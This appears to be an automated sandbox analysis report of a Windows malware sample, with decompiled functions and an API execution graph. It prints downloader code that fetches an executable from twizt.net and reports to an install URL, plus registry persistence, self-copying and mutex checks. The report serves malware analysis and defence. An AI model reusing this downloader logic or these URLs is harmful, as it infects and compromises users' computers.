                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_1090000_gEkl9O5tiu.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                                                                                                                    • String ID: %s\33573537.jpg$%temp%
                                                                                                                                                                                                                                                                                    • API String ID: 750032643-2829634191
                                                                                                                                                                                                                                                                                    • Opcode ID: b2df60e89207c59a4c2960b999fb63c004ebd3b1b70d55075b4e65be076c56c2
                                                                                                                                                                                                                                                                                    • Instruction ID: b4e0e66dd5723f3320d8d6ffb9eca7fdb357e4fa150983ca9be2ba9feafad57b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2df60e89207c59a4c2960b999fb63c004ebd3b1b70d55075b4e65be076c56c2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F090B4644300B7EB309B64EC5AFD637697B80704F80CA18B7E5D50C2E7BA919CD7A5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 26 1091000-1091065 memset CreateProcessW 27 1091078-109107d 26->27 28 1091067-1091077 Sleep 26->28
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E01091000(WCHAR* _a4) {
                                                                                                                                                                                                                                                                                    				struct _STARTUPINFOW _v68;
                                                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                                                                                    				int _t15;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				memset( &_v68, 0, 0x44);
                                                                                                                                                                                                                                                                                    				_v84 = 0;
                                                                                                                                                                                                                                                                                    				_v80 = 0;
                                                                                                                                                                                                                                                                                    				_v76 = 0;
                                                                                                                                                                                                                                                                                    				_v72 = 0;
                                                                                                                                                                                                                                                                                    				_v68.wShowWindow = 5;
                                                                                                                                                                                                                                                                                    				_v68.cb = 0x44;
                                                                                                                                                                                                                                                                                    				_v68.dwFlags = 1;
                                                                                                                                                                                                                                                                                    				_t15 = CreateProcessW(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v68,  &_v84 + 0xc); // executed
                                                                                                                                                                                                                                                                                    				if(_t15 != 1) {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x0109100c
                                                                                                                                                                                                                                                                                    0x0109101a
                                                                                                                                                                                                                                                                                    0x0109101e
                                                                                                                                                                                                                                                                                    0x01091022
                                                                                                                                                                                                                                                                                    0x01091026
                                                                                                                                                                                                                                                                                    0x0109103e
                                                                                                                                                                                                                                                                                    0x0109104c
                                                                                                                                                                                                                                                                                    0x01091054
                                                                                                                                                                                                                                                                                    0x0109105c
                                                                                                                                                                                                                                                                                    0x01091065
                                                                                                                                                                                                                                                                                    0x0109107d
                                                                                                                                                                                                                                                                                    0x01091067
                                                                                                                                                                                                                                                                                    0x0109106c
                                                                                                                                                                                                                                                                                    0x01091077
                                                                                                                                                                                                                                                                                    0x01091077

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.379745424.0000000001091000.00000020.00000001.01000000.00000003.sdmp, Offset: 01090000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379706425.0000000001090000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379751346.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379756642.0000000001094000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_1090000_gEkl9O5tiu.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateProcessSleepmemset
                                                                                                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                                                                                                    • API String ID: 4129363112-2746444292
                                                                                                                                                                                                                                                                                    • Opcode ID: 514be856930f27b027e5ffe9b581fe774fa5b6080b345cb8d0d4b1cf41a240e7
                                                                                                                                                                                                                                                                                    • Instruction ID: f0606be3e3797390ef68aaceba7e5835ba9d835fc632834e745f472a712fd157
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 514be856930f27b027e5ffe9b581fe774fa5b6080b345cb8d0d4b1cf41a240e7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA016DB0A44300AAE710DF20CC46B4B77E5BB88B00F50491DF399DA2C0E7BA95088B57
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 29 10913e0-10913ff Sleep call 1091080 call 1091360 34 1091401 call 1091300 29->34 35 1091406-1091408 29->35 34->35
                                                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                    			E010913E0(void* __edi) {
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    				_push(L"http://twizt.net/newtpp.exe");
                                                                                                                                                                                                                                                                                    				E01091080(__edi);
                                                                                                                                                                                                                                                                                    				if(E01091360() != 0) {
                                                                                                                                                                                                                                                                                    					E01091300();
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                                                                                    0x010913e5
                                                                                                                                                                                                                                                                                    0x010913eb
                                                                                                                                                                                                                                                                                    0x010913f0
                                                                                                                                                                                                                                                                                    0x010913ff
                                                                                                                                                                                                                                                                                    0x01091401
                                                                                                                                                                                                                                                                                    0x01091401
                                                                                                                                                                                                                                                                                    0x01091408

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 010913E5
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: GetTickCount.KERNEL32 ref: 01091089
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: srand.MSVCR90 ref: 01091090
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: ExpandEnvironmentStringsW.KERNEL32 ref: 010910AF
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: rand.MSVCR90 ref: 010910B5
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: rand.MSVCR90 ref: 010910C9
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: wsprintfW.USER32 ref: 010910F5
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 01091107
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 01091133
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 01091157
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: InternetReadFile.WININET(00000000,?,00000103,?), ref: 01091181
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 010911A0
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091080: InternetReadFile.WININET(00000000,?,00000103,?), ref: 010911B9
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091360: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 01091378
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091360: wsprintfW.USER32 ref: 01091390
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091360: PathFileExistsW.SHLWAPI(00000000), ref: 0109139D
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091300: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 01091310
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091300: InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 01091337
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091300: Sleep.KERNEL32(000003E8), ref: 01091344
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091300: InternetCloseHandle.WININET(00000000), ref: 01091347
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091300: Sleep.KERNEL32(000003E8), ref: 0109134F
                                                                                                                                                                                                                                                                                      • Part of subcall function 01091300: InternetCloseHandle.WININET(00000000), ref: 01091352
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • http://twizt.net/newtpp.exe, xrefs: 010913EB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.379745424.0000000001091000.00000020.00000001.01000000.00000003.sdmp, Offset: 01090000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379706425.0000000001090000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379751346.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.379756642.0000000001094000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_1090000_gEkl9O5tiu.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$File$Open$Sleep$CloseEnvironmentExpandHandleReadStringsrandwsprintf$CountCreateExistsPathTickWritesrand
                                                                                                                                                                                                                                                                                    • String ID: http://twizt.net/newtpp.exe
                                                                                                                                                                                                                                                                                    • API String ID: 3094868945-3495472230
                                                                                                                                                                                                                                                                                    • Opcode ID: 036077cca7d7ec9289a50599cc7470c31cd002c30858b0f583ce45fc35a1a271
                                                                                                                                                                                                                                                                                    • Instruction ID: 690d823ae43df43ffcb07b3b9cde8e7168697eab21b641541a1b94c7198a98b0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 036077cca7d7ec9289a50599cc7470c31cd002c30858b0f583ce45fc35a1a271
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1C08C31B00203B39F4033B1193BA8911A01AA81EAF04C491B7CA4948AEEA28015B123
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                    Execution Coverage:1.1%
                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                    Signature Coverage:17.2%
                                                                                                                                                                                                                                                                                    Total number of Nodes:1439
                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:7
                                                                                                                                                                                                                                                                                    execution_graph 5265 40bec0 5268 40a210 5265->5268 5279 40a221 5268->5279 5270 40a23f 5272 408c70 _invalid_parameter 3 API calls 5270->5272 5273 40a5a4 5272->5273 5274 409f60 20 API calls 5274->5279 5277 40a0b0 13 API calls 5277->5279 5278 409c60 28 API calls 5278->5279 5279->5270 5279->5274 5279->5277 5279->5278 5282 40a130 5279->5282 5289 409cd0 EnterCriticalSection 5279->5289 5294 405820 5279->5294 5299 405860 5279->5299 5304 405730 5279->5304 5311 405790 5279->5311 5283 40a141 lstrlenA 5282->5283 5284 40ab80 7 API calls 5283->5284 5288 40a15f 5284->5288 5285 40a16b 5286 40a1ef 5285->5286 5287 408c70 _invalid_parameter 3 API calls 5285->5287 5286->5279 5287->5286 5288->5283 5288->5285 5290 409ce8 5289->5290 5291 409d24 LeaveCriticalSection 5290->5291 5314 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5290->5314 5291->5279 5293 409d13 5293->5291 5315 4057c0 5294->5315 5297 405859 5297->5279 5298 40bba0 17 API calls 5298->5297 5300 4057c0 65 API calls 5299->5300 5301 40587f 5300->5301 5303 4058ac 5301->5303 5325 4056e0 5301->5325 5303->5279 5336 4048b0 EnterCriticalSection 5304->5336 5306 40574a 5307 40577d 5306->5307 5341 405640 5306->5341 5307->5279 5310 408c70 _invalid_parameter 3 API calls 5310->5307 5348 404970 EnterCriticalSection 5311->5348 5313 4057b2 5313->5279 5314->5293 5318 4057d3 5315->5318 5316 405810 5316->5297 5316->5298 5318->5316 5319 4047c0 EnterCriticalSection 5318->5319 5320 40b210 63 API calls 5319->5320 5323 4047e0 5320->5323 5321 40488e LeaveCriticalSection 5321->5318 5322 408c70 _invalid_parameter 3 API calls 5324 40488b 5322->5324 5323->5321 5323->5322 5324->5321 5328 409ec0 5325->5328 5329 40a8f0 3 API calls 5328->5329 5330 409ecb 5329->5330 5331 409ee7 lstrlenA 5330->5331 5332 40ab80 7 API calls 5331->5332 5333 409f1d 5332->5333 5334 405725 5333->5334 5335 408c70 _invalid_parameter 3 API calls 5333->5335 5334->5303 5335->5334 5337 4048ce 5336->5337 5338 40495a LeaveCriticalSection 5337->5338 5339 408ce0 8 API calls 5337->5339 5338->5306 5340 40492c 5339->5340 5340->5338 5342 408b20 __aligned_recalloc_base 7 API calls 5341->5342 5343 405652 memcpy 5342->5343 5344 409ec0 13 API calls 5343->5344 5345 4056bc 5344->5345 5346 408c70 _invalid_parameter 3 API calls 5345->5346 5347 4056cb 5346->5347 5347->5310 5372 40b270 5348->5372 5351 404bae LeaveCriticalSection 5351->5313 5352 40b210 63 API calls 5353 4049ab 5352->5353 5353->5351 5356 408c70 _invalid_parameter 3 API calls 5353->5356 5371 404ac3 5353->5371 5354 404aec 5357 408c70 _invalid_parameter 3 API calls 5354->5357 5355 4044e0 68 API calls 5355->5354 5358 404a22 5356->5358 5359 404b0d 5357->5359 5360 408ce0 8 API calls 5358->5360 5359->5351 5361 404b1c CreateFileW 5359->5361 5362 404a32 5360->5362 5361->5351 5363 404b3f 5361->5363 5364 408c70 _invalid_parameter 3 API calls 5362->5364 5366 404b9a FlushFileBuffers CloseHandle 5363->5366 5367 404b5c WriteFile 5363->5367 5365 404a59 5364->5365 5368 40ab80 7 API calls 5365->5368 5366->5351 5367->5363 5369 404a90 5368->5369 5370 405c90 65 API calls 5369->5370 5370->5371 5371->5354 5371->5355 5375 40a7c0 5372->5375 5382 40a7d3 5375->5382 5376 408ce0 8 API calls 5376->5382 5377 40a7ed 5379 408c70 _invalid_parameter 3 API calls 5377->5379 5378 40a720 62 API calls 5378->5382 5380 404994 5379->5380 5380->5351 5380->5352 5381 4065e0 61 API calls 5381->5382 5382->5376 5382->5377 5382->5378 5382->5381 5590 40e400 GetTickCount WaitForSingleObject 5591 40e5a9 5590->5591 5592 40e42d WSAWaitForMultipleEvents 5590->5592 5593 40e4d0 GetTickCount 5592->5593 5594 40e44a WSAEnumNetworkEvents 5592->5594 5595 40e523 GetTickCount 5593->5595 5596 40e4e5 EnterCriticalSection 5593->5596 5594->5593 5606 40e463 5594->5606 5597 40e595 WaitForSingleObject 5595->5597 5598 40e52e EnterCriticalSection 5595->5598 5599 40e4f6 5596->5599 5600 40e51a LeaveCriticalSection 5596->5600 5597->5591 5597->5592 5602 40e581 LeaveCriticalSection GetTickCount 5598->5602 5603 40e53f InterlockedExchangeAdd 5598->5603 5604 40e509 LeaveCriticalSection 5599->5604 5640 40e300 5599->5640 5600->5597 5601 40e472 accept 5601->5593 5601->5606 5602->5597 5650 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5603->5650 5604->5597 5606->5593 5606->5601 5612 40df90 5606->5612 5632 40e7d0 5606->5632 5609 40e552 5609->5602 5609->5603 5651 409600 shutdown closesocket 5609->5651 5613 40dfa2 EnterCriticalSection 5612->5613 5614 40df9d 5612->5614 5615 40dfb7 5613->5615 5616 40dfcd LeaveCriticalSection 5613->5616 5614->5606 5615->5616 5617 40dfd8 5616->5617 5618 40dfdf 5616->5618 5617->5606 5619 408b00 7 API calls 5618->5619 5620 40dfe9 5619->5620 5621 40dff6 getpeername CreateIoCompletionPort 5620->5621 5622 40e088 5620->5622 5623 40e082 5621->5623 5624 40e036 5621->5624 5654 409600 shutdown closesocket 5622->5654 5628 408c70 _invalid_parameter 3 API calls 5623->5628 5652 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5624->5652 5626 40e093 5626->5606 5628->5622 5629 40e03b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5653 40deb0 EnterCriticalSection LeaveCriticalSection 5629->5653 5631 40e07b 5631->5606 5633 40e7e0 InterlockedExchangeAdd 5632->5633 5634 40e7dc 5632->5634 5635 40e833 5633->5635 5636 40e7f7 InterlockedIncrement 5633->5636 5634->5593 5635->5593 5655 40e730 WSARecv 5636->5655 5638 40e826 5638->5635 5639 40e82c InterlockedDecrement 5638->5639 5639->5635 5641 40e310 5640->5641 5648 40e3e1 5640->5648 5642 40e31d InterlockedExchangeAdd 5641->5642 5641->5648 5642->5648 5649 40e334 5642->5649 5643 40e360 5644 40e371 5643->5644 5670 409600 shutdown closesocket 5643->5670 5645 40e387 InterlockedDecrement 5644->5645 5644->5648 5645->5648 5648->5600 5649->5643 5649->5648 5661 40e280 EnterCriticalSection 5649->5661 5650->5609 5651->5609 5652->5629 5653->5631 5654->5626 5656 40e7b2 5655->5656 5657 40e76e 5655->5657 5656->5638 5658 40e770 WSAGetLastError 5657->5658 5659 40e784 Sleep WSARecv 5657->5659 5660 40e7bb 5657->5660 5658->5656 5658->5657 5659->5656 5659->5658 5660->5638 5662 40e2e7 LeaveCriticalSection 5661->5662 5663 40e29a InterlockedExchangeAdd 5661->5663 5662->5649 5664 40e2aa LeaveCriticalSection 5663->5664 5665 40e2b9 5663->5665 5664->5649 5666 408c70 _invalid_parameter 3 API calls 5665->5666 5667 40e2de 5666->5667 5668 408c70 _invalid_parameter 3 API calls 5667->5668 5669 40e2e4 5668->5669 5669->5662 5670->5644 5671 404880 5673 40481b 5671->5673 5672 408c70 _invalid_parameter 3 API calls 5674 40488b LeaveCriticalSection 5672->5674 5673->5672 5383 40c741 5384 40c74a 5383->5384 5385 40c83d 5384->5385 5386 40c7b3 lstrcmpiW 5384->5386 5387 40c833 SysFreeString 5386->5387 5388 40c7c6 5386->5388 5387->5385 5389 40c200 2 API calls 5388->5389 5391 40c7d4 5389->5391 5390 40c825 5390->5387 5391->5387 5391->5390 5392 40c803 lstrcmpiW 5391->5392 5393 40c815 5392->5393 5394 40c81b SysFreeString 5392->5394 5393->5394 5394->5390 5395 404acc 5396 4049cc 5395->5396 5397 404ac3 5396->5397 5399 408c70 _invalid_parameter 3 API calls 5396->5399 5398 4044e0 68 API calls 5397->5398 5401 404aec 5397->5401 5398->5401 5402 404a22 5399->5402 5400 408c70 _invalid_parameter 3 API calls 5403 404b0d 5400->5403 5401->5400 5404 408ce0 8 API calls 5402->5404 5405 404b1c CreateFileW 5403->5405 5406 404bae LeaveCriticalSection 5403->5406 5407 404a32 5404->5407 5405->5406 5408 404b3f 5405->5408 5409 408c70 _invalid_parameter 3 API calls 5407->5409 5411 404b9a FlushFileBuffers CloseHandle 5408->5411 5412 404b5c WriteFile 5408->5412 5410 404a59 5409->5410 5413 40ab80 7 API calls 5410->5413 5411->5406 5412->5408 5414 404a90 5413->5414 5415 405c90 65 API calls 5414->5415 5415->5397 5416 408d4e 5417 408c70 _invalid_parameter 3 API calls 5416->5417 5420 408d0d 5417->5420 5418 408d22 5419 408b20 __aligned_recalloc_base 7 API calls 5419->5420 5420->5418 5420->5419 5421 408d24 memcpy 5420->5421 5421->5420 4311 405e10 Sleep 4312 405e38 4311->4312 4313 405e46 PathFileExistsW 4312->4313 4314 405e98 CreateMutexA GetLastError 4312->4314 4313->4312 4315 405e55 CopyFileW MoveFileA MoveFileW 4313->4315 4316 405ec2 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 4314->4316 4317 405eba ExitProcess 4314->4317 4315->4312 4318 405f4d 4316->4318 4319 40623a Sleep RegOpenKeyExA 4318->4319 4366 40d0f0 GetLocaleInfoA 4318->4366 4321 406351 RegOpenKeyExA 4319->4321 4322 40626b 8 API calls 4319->4322 4323 406377 8 API calls 4321->4323 4324 40645d Sleep 4321->4324 4322->4321 4323->4324 4374 40b1c0 4324->4374 4327 405fe4 ExitProcess 4328 405fec ExpandEnvironmentStringsW wsprintfW CopyFileW 4330 406040 SetFileAttributesW RegOpenKeyExW 4328->4330 4331 406119 Sleep wsprintfW CopyFileW 4328->4331 4334 406075 RegSetValueExW RegCloseKey 4330->4334 4335 4060fa 4330->4335 4331->4319 4333 406161 SetFileAttributesW RegOpenKeyExW 4331->4333 4332 406478 9 API calls 4377 4045f0 InitializeCriticalSection CreateFileW 4332->4377 5160 4043f0 4332->5160 5169 4054a0 Sleep GetModuleFileNameW 4332->5169 5183 405cf0 4332->5183 4338 406196 RegSetValueExW RegCloseKey 4333->4338 4339 40621b 4333->4339 4334->4335 4368 40d390 memset CreateProcessW 4335->4368 4338->4339 4343 40d390 5 API calls 4339->4343 4348 406227 4343->4348 4344 4065c5 4345 406111 ExitProcess 4348->4319 4350 406232 ExitProcess 4348->4350 4352 40652d CreateEventA 4409 40a8f0 4352->4409 4361 40bba0 17 API calls 4362 40658d 4361->4362 4363 40bba0 17 API calls 4362->4363 4364 4065a9 4363->4364 4365 40bba0 17 API calls 4364->4365 4365->4344 4367 405fdc 4366->4367 4367->4327 4367->4328 4369 40d3f0 Sleep 4368->4369 4370 40d3ff ShellExecuteW 4368->4370 4371 406106 4369->4371 4372 40d434 4370->4372 4373 40d425 Sleep 4370->4373 4371->4331 4371->4345 4372->4371 4373->4371 4454 40b190 4374->4454 4378 404715 4377->4378 4379 404628 CreateFileMappingW 4377->4379 4391 40d020 CoInitializeEx 4378->4391 4380 404649 MapViewOfFile 4379->4380 4381 40470b CloseHandle 4379->4381 4382 404701 CloseHandle 4380->4382 4383 404668 GetFileSize 4380->4383 4381->4378 4382->4381 4385 40467d 4383->4385 4384 4046f7 UnmapViewOfFile 4384->4382 4385->4384 4387 4046bc 4385->4387 4390 40468c 4385->4390 4583 40b210 4385->4583 4590 4044e0 4385->4590 4388 408c70 _invalid_parameter 3 API calls 4387->4388 4388->4390 4390->4384 4890 40c580 socket 4391->4890 4393 40d0c8 4934 408d90 4393->4934 4396 40d040 4396->4393 4397 406528 4396->4397 4398 40d08a 4396->4398 4900 40cc30 4396->4900 4404 405ba0 CoInitializeEx SysAllocString 4397->4404 4915 409540 htons 4398->4915 4403 40cfa0 24 API calls 4403->4393 4405 405bc2 4404->4405 4406 405bd8 CoUninitialize 4404->4406 5079 405910 4405->5079 4406->4352 5088 40a8b0 4409->5088 4412 40a8b0 3 API calls 4413 40a90e 4412->4413 4414 40a8b0 3 API calls 4413->4414 4415 40a91e 4414->4415 4416 40a8b0 3 API calls 4415->4416 4417 406545 4416->4417 4418 40baf0 4417->4418 4419 408b00 7 API calls 4418->4419 4420 40bafb 4419->4420 4421 40654f 4420->4421 4422 40bb07 InitializeCriticalSection 4420->4422 4423 409d40 InitializeCriticalSection 4421->4423 4422->4421 4430 409d5a 4423->4430 4424 409d89 CreateFileW 4425 409db0 CreateFileMappingW 4424->4425 4426 409e72 4424->4426 4428 409dd1 MapViewOfFile 4425->4428 4429 409e68 CloseHandle 4425->4429 5132 409750 EnterCriticalSection 4426->5132 4433 409dec GetFileSize 4428->4433 4434 409e5e CloseHandle 4428->4434 4429->4426 4430->4424 5095 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 4430->5095 5096 409a30 4430->5096 4432 409e77 4436 40bba0 17 API calls 4432->4436 4440 409e0b 4433->4440 4434->4429 4437 406559 4436->4437 4442 40bba0 4437->4442 4438 409e54 UnmapViewOfFile 4438->4434 4440->4438 4441 409a30 28 API calls 4440->4441 5131 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 4440->5131 4441->4440 4443 40bbb7 EnterCriticalSection 4442->4443 4444 406572 4442->4444 5155 40bb20 4443->5155 4444->4361 4447 40bc7b LeaveCriticalSection 4447->4444 4448 408b60 9 API calls 4449 40bbf9 4448->4449 4449->4447 4450 40bc0b CreateThread 4449->4450 4450->4447 4451 40bc2e 4450->4451 4452 40bc52 GetCurrentProcess GetCurrentProcess DuplicateHandle 4451->4452 4453 40bc74 4451->4453 4452->4453 4453->4447 4457 40b130 4454->4457 4458 40b163 4457->4458 4459 40b14e 4457->4459 4462 40646d 4458->4462 4489 40af60 4458->4489 4463 40ade0 4459->4463 4462->4332 4462->4344 4464 40ae92 4463->4464 4465 40ae09 4463->4465 4467 408b00 7 API calls 4464->4467 4488 40ae8a 4464->4488 4465->4488 4523 408b00 4465->4523 4469 40aeb8 4467->4469 4471 401000 7 API calls 4469->4471 4469->4488 4473 40aee5 4471->4473 4475 4011e0 10 API calls 4473->4475 4477 40aeff 4475->4477 4476 40ae5f 4478 401000 7 API calls 4476->4478 4479 401000 7 API calls 4477->4479 4480 40ae70 4478->4480 4481 40af10 4479->4481 4482 4011e0 10 API calls 4480->4482 4483 4011e0 10 API calls 4481->4483 4482->4488 4484 40af2a 4483->4484 4485 401000 7 API calls 4484->4485 4486 40af3b 4485->4486 4487 4011e0 10 API calls 4486->4487 4487->4488 4488->4462 4490 40af89 4489->4490 4493 40b03a 4489->4493 4491 40b032 4490->4491 4492 408b00 7 API calls 4490->4492 4491->4462 4494 40af9f 4492->4494 4493->4491 4495 408b00 7 API calls 4493->4495 4494->4491 4497 401000 7 API calls 4494->4497 4496 40b05e 4495->4496 4496->4491 4499 401000 7 API calls 4496->4499 4498 40afc3 4497->4498 4500 408b00 7 API calls 4498->4500 4501 40b082 4499->4501 4503 40afd2 4500->4503 4502 408b00 7 API calls 4501->4502 4504 40b091 4502->4504 4505 4011e0 10 API calls 4503->4505 4507 4011e0 10 API calls 4504->4507 4506 40affb 4505->4506 4508 408c70 _invalid_parameter 3 API calls 4506->4508 4509 40b0ba 4507->4509 4510 40b007 4508->4510 4511 408c70 _invalid_parameter 3 API calls 4509->4511 4512 401000 7 API calls 4510->4512 4513 40b0c6 4511->4513 4514 40b018 4512->4514 4515 401000 7 API calls 4513->4515 4516 4011e0 10 API calls 4514->4516 4517 40b0d7 4515->4517 4516->4491 4518 4011e0 10 API calls 4517->4518 4519 40b0f1 4518->4519 4520 401000 7 API calls 4519->4520 4521 40b102 4520->4521 4522 4011e0 10 API calls 4521->4522 4522->4491 4534 408a60 4523->4534 4526 401000 4555 408b20 4526->4555 4531 4011e0 4562 4010c0 4531->4562 4533 4011ff _invalid_parameter 4533->4476 4543 408850 GetCurrentProcessId 4534->4543 4536 408a6b 4537 408a77 __aligned_recalloc_base 4536->4537 4544 4089c0 4536->4544 4539 408aec 4537->4539 4540 408a92 HeapAlloc 4537->4540 4539->4488 4539->4526 4540->4539 4541 408ab9 __aligned_recalloc_base 4540->4541 4541->4539 4542 408ad4 memset 4541->4542 4542->4539 4543->4536 4552 408850 GetCurrentProcessId 4544->4552 4546 4089c9 4547 4089e6 HeapCreate 4546->4547 4553 408930 GetProcessHeaps 4546->4553 4549 408a00 HeapSetInformation GetCurrentProcessId 4547->4549 4550 408a27 4547->4550 4549->4550 4550->4537 4552->4546 4554 408961 4553->4554 4554->4547 4554->4550 4556 408a60 __aligned_recalloc_base 7 API calls 4555->4556 4557 40100b 4556->4557 4558 401400 4557->4558 4559 40140a 4558->4559 4560 408b20 __aligned_recalloc_base 7 API calls 4559->4560 4561 401018 4560->4561 4561->4531 4563 40110e 4562->4563 4565 4010d1 4562->4565 4564 408b20 __aligned_recalloc_base 7 API calls 4563->4564 4563->4565 4567 401132 _invalid_parameter 4564->4567 4565->4533 4566 401162 memcpy 4568 401186 _invalid_parameter 4566->4568 4567->4566 4572 408c70 4567->4572 4570 408c70 _invalid_parameter 3 API calls 4568->4570 4570->4565 4579 408850 GetCurrentProcessId 4572->4579 4574 408c7b 4575 40115f 4574->4575 4580 408870 4574->4580 4575->4566 4578 408c97 HeapFree 4578->4575 4579->4574 4581 4088a0 HeapValidate 4580->4581 4582 4088c0 4580->4582 4581->4582 4582->4575 4582->4578 4599 408ce0 4583->4599 4586 40b251 4586->4385 4589 408c70 _invalid_parameter 3 API calls 4589->4586 4807 408b60 4590->4807 4593 408ce0 8 API calls 4594 40454b 4593->4594 4817 40ab80 4594->4817 4597 4045d1 4597->4385 4600 408d0d 4599->4600 4601 408b20 __aligned_recalloc_base 7 API calls 4600->4601 